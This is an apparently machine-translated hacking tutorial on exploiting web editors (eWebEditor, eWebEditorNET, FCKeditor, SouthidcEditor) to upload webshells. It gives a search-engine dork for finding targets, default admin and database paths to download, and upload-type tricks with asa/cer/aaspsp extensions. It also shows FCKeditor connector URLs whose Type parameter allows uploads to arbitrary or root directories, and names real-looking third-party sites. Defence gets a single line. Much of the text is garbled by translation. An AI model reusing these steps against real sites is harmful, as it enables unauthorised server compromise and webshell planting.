Site: editor inurl: asp? Id inurl: ewebeditornet
For example, common editor vulnerabilities include:
Ewebeditor
Ewebeditornet
Fckeditor
Editor
Southidceditor
SouthidcEditor
Bigaccessories ditor
I. ewebeditor
1: The background downloaded by default:
Http://www.test.com/ewebeditor/admin_login.asp
If the background can enter:
Click style management:
Copy a copy of the standard file (you cannot modify it directly)
Add the image type (asa aaspsp) to the copy and Click Preview.
Click design in the editor and then directly upload the asa Trojan.
After uploading, you can see the location of the Trojan in the code!
(Principle: because the application configures an asa extension in the properties of the iis website, asp. dll is used for parsing, and asp also has cer cdx)
If the cer cdx asa is deleted, the ing cannot be found.
You can add aaspsp to the style image type after copying, and then upload asp files directly after uploading.
2: Download the default database
Www.test.com/ewebeditor/db/ewebeditor.mdb
Then analyze the database
Webeditor_system (1), you can see that the user name and password cannot be cracked.
In the webeditor_style (14 style table
The extension (s-fileext s_ingeext) of the files that can be uploaded)
I saw a small hacker who once performed asa aaspsp too much.
You can use it! (This method can also be used if the backend cannot be found)
Statements that can be constructed:
For example, ID = 46 s-name = standard1
Construction Code: ewebeditor. asp? Id = content & style = standard
After the ID and style name are changed
Ewebeditor. asp? Id = 46 & style = standard1
Then, go to the editor and upload the asa or asp file to get the webshell.
Ii. Exploitation of ewebeditornet Vulnerabilities
Default upload address:
Aspx "> www.test.com/ewebeditornet/upload.aspx
You can directly upload a cer Trojan.
Upload fails.
You can construct the following code in the address bar: javascript: lbtnUpload. click ();
Then view the source code:
Find uploadsave find address
Uploaded to the previusfile folder by default.
(Vulnerability repair: You can directly select none of the execution permissions of the upload folder in iss .)
Iii. fckeditor vulnerability Exploitation
Http://www.test.com/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp? Command = FileUpload & Type = Image & CurrentFolder =/
Change the file name field to NEWfile and select the file name to be defined.
After the upload, find the file in/userfiles/image /.
4. southidceditor
Http://www.xhkjit.com/admin/southidceditor/datas/southidceditor.mdb
Http://www.xhkjit.com/admin/southidceditor/popup.asp
Http://www.xhkjit.com/admin/southidceditor/admin/admin_login.asp
5. bigaccessories ditor
This page is not mentioned.
Similar principles!
The defense method is very simple,
FCKeditor upload vulnerability,
Html? Type = all & Connector = connectors/asp/connector. asp "> http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html? Type = all & Connector = connectors/asp/connector. asp
Open this address to upload any types of files. The location where the horse uploads files is:
Http://www.xxx.com/UserFiles/all/1.asa
The variable "Type = all" is defined by yourself. The directory "all" is created here, and the new directory does not have any restrictions on the file format to be uploaded.
For example, input:
Http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html? Type = monyer & Connector = connectors/asp/connector. asp
The passed file is under the http://www.xxx.com/UserFiles/monyer/.
And if you enter: http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html? Type = ../& Connector = connectors/asp/connector. asp
You can upload the script to the root directory of the website.
The uploaded file is under the root directory of the website.
Http://www.b-horse.cn/newEbiz1/EbizPortalFG/portal/html/BBSThreadMessageMaint.html? ForumID = 46 & threadID = 457 & messageID = 532 & ListType = FromForum & FromCurrentPage = 1 & time = 1219282232781